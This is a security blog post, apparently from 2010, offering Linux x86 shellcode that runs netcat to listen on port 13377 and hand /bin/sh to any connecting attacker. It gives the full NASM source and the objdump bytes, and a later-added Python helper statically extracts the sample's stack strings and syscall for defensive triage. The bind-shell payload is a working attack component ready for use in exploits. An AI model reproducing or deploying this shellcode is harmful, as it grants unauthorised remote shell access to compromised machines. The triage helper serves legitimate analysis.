linux x86 nc -lvve/bin/sh -p13377 shellcode
Source: http://chaossecurity.wordpress.com  Author: Manojlovic  Published: 2010-04-06

This shellcode listens on port 13377 using netcat and gives /bin/sh to the connecting attacker.
Author: Teo Manojlovic
Site: http://chaossecurity.wordpress.com/
Here is the code, written for NASM:

/////////////////////////////
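section .text
    global _start
_start:
    xor eax,eax             ; eax = 0, pushed below as NUL / NULL
    xor edx,edx
    push 0x37373333         ; "3377"
    push 0x3170762d         ; "-vp1"  -> esp now points at "-vp13377"
    mov edx, esp            ; edx = pointer to "-vp13377"
    push eax                ; NUL terminator for the next string
    push 0x68732f6e         ; "n/sh"
    push 0x69622f65         ; "e/bi"
    push 0x76766c2d         ; "-lvv"  -> "-lvve/bin/sh"
    mov ecx,esp             ; ecx = pointer to "-lvve/bin/sh"
    push eax                ; NUL terminator for the next string
    push 0x636e2f2f         ; "//nc"
    push 0x2f2f2f2f         ; "////"
    push 0x6e69622f         ; "/bin"  -> "/bin//////nc"
    mov ebx, esp            ; ebx = path argument for execve
    push eax                ; argv[3] = NULL
    push edx                ; argv[2] = "-vp13377"
    push ecx                ; argv[1] = "-lvve/bin/sh"
    push ebx                ; argv[0] = "/bin//////nc"
    xor edx,edx             ; envp = NULL
    mov ecx,esp             ; ecx = argv
    mov al,11               ; syscall 11 = execve
    int 0x80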
//////////////////////////////////
And here is the objdump output, from which you can read off the shellcode bytes:

//////////////////////////////////
teo@teo-desktop ~ $ objdump -d a.out

a.out:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 31 d2                 xor    %edx,%edx
 8048064: 68 33 33 37 37        push   $0x37373333
 8048069: 68 2d 76 70 31        push   $0x3170762d
 804806e: 89 e2                 mov    %esp,%edx
 8048070: 50                    push   %eax
 8048071: 68 6e 2f 73 68        push   $0x68732f6e
 8048076: 68 65 2f 62 69        push   $0x69622f65
 804807b: 68 2d 6c 76 76        push   $0x76766c2d
 8048080: 89 e1                 mov    %esp,%ecx
 8048082: 50                    push   %eax
 8048083: 68 2f 2f 6e 63        push   $0x636e2f2f
 8048088: 68 2f 2f 2f 2f        push   $0x2f2f2f2f
 804808d: 68 2f 62 69 6e        push   $0x6e69622f
 8048092: 89 e3                 mov    %esp,%ebx
 8048094: 50                    push   %eax
 8048095: 52                    push   %edx
 8048096: 51                    push   %ecx
 8048097: 53                    push   %ebx
 8048098: 31 d2                 xor    %edx,%edx
 804809a: 89 e1                 mov    %esp,%ecx
 804809c: b0 0b                 mov    $0xb,%al
 804809e: cd 80                 int    $0x80
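
Added example (not part of the original post): a small Python triage helper that statically recovers the strings this sample builds on the stack with `push imm32`, and the syscall number loaded before `int 0x80`, from the opcode bytes in the objdump listing above. The names `insn_len` and `triage` and the deliberately limited opcode subset are assumptions of this example.

```python
# Added example: static triage of the opcode bytes in the objdump listing above.
SHELLCODE = bytes.fromhex(
    "31c0 31d2 6833333737 682d767031 89e2 50"
    " 686e2f7368 68652f6269 682d6c7676 89e1 50"
    " 682f2f6e63 682f2f2f2f 682f62696e 89e3"
    " 50 52 51 53 31d2 89e1 b00b cd80"
)
SYSCALLS = {11: "execve"}  # i386 syscall number used by this sample


def insn_len(code, i):
    """Length of the instruction at offset i (only the subset seen here)."""
    op = code[i]
    if op == 0x68:                                   # push imm32
        return 5
    if 0x50 <= op <= 0x57:                           # push r32
        return 1
    if op in (0x31, 0x89) and i + 1 < len(code) and code[i + 1] >> 6 == 3:
        return 2                                     # xor/mov reg,reg
    if 0xB0 <= op <= 0xB7 or op == 0xCD:             # mov r8,imm8 / int imm8
        return 2
    raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")


def triage(code):
    """Linear sweep returning (stack_strings, syscalls)."""
    strings, syscalls, run, al, i = [], [], [], None, 0

    def flush():
        if run:
            # The last push sits at the lowest address, so reverse the run.
            strings.append(b"".join(reversed(run)).decode("latin-1"))
            run.clear()

    while i < len(code):
        n = insn_len(code, i)
        if i + n > len(code):
            raise ValueError(f"truncated instruction at offset {i}")
        if code[i] == 0x68:
            run.append(code[i + 1:i + 5])
        else:
            flush()
            if code[i] == 0xB0:                      # mov al, imm8
                al = code[i + 1]
            elif code[i] == 0xCD and code[i + 1] == 0x80:
                syscalls.append(SYSCALLS.get(al, al))
        i += n
    flush()
    return strings, syscalls


if __name__ == "__main__":
    print(triage(SHELLCODE))
```

The recovered path and argument strings are what would appear in process-execution telemetry for this sample, so they can be matched against exec logs during triage.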